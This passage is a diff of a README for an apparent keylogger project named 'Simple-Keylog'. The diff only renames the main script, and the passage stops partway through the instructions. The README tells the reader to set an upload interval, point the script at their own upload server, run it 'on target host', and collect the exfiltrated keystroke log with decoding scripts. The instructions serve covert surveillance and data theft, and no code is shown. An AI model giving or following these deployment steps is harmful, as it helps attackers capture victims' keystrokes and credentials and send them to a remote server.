cons0le7/Simple-Keylog/README.md

 # How to use:

-- Edit "simple_keylog.sh" in notepad.
+- Edit "keylog.sh" in notepad.
 - replace the upload interval with your desired amount in seconds.
 - Replace "http://yourserver.com/upload" with your own upload server url.
-- Run "simple_keylog.sh" on target host.
+- Run "keylog.sh" on target host.
 - "logs.txt" will upload to your server and update every X number of seconds according to your specification.
 - Move "decoder.py" and "sentencer.py" to the same directory of server as "logs.txt" or create a new folder and add all files to it.
 - cd to directory where both files are contained and you can either run: